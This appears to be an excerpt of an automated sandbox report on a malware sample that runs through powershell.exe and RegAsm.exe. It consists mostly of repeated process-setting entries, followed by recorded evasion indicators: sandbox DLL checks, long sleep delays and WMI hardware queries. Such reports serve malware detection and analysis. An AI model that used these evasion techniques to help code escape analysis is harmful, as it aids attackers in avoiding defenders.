                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3896, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: RegAsm.exe, 00000006.00000002.1619760521.00000000032A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 32A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1126Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1761Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4286Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5536Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 5322Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2960Thread sleep count: 4286 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5220Thread sleep count: 5536 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5652Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -35890s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -35781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -35672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -35562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -35453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -35344s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -35219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -35109s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -34999s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -34890s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -34780s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -34637s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -34531s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -34422s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -34310s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -34203s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -34094s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -33969s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -33859s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -33750s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -33640s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2228Thread sleep time: -33531s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1816Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
